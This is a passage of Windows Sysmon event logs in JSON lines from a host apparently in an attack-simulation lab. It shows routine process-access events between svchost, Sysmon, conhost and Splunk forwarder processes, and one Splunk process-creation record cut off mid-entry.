{"EventTime":"2020-08-01 07:53:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2264,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:31.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:31.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2265,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:31.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:31.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2266,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:31.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:31.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2267,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:31.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:31.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2268,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:31.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:31.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2269,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:31.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:31.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2270,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:31.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:31.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2271,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:31.251\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F7B-5F25-0000-001054180400}\r\nTargetProcessId: 3508\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:31.251","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F7B-5F25-0000-001054180400}","TargetProcessId":"3508","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2272,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:31.929\r\nProcessGuid: {41C8662E-1F7B-5F25-0000-0010041A0400}\r\nProcessId: 4048\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: 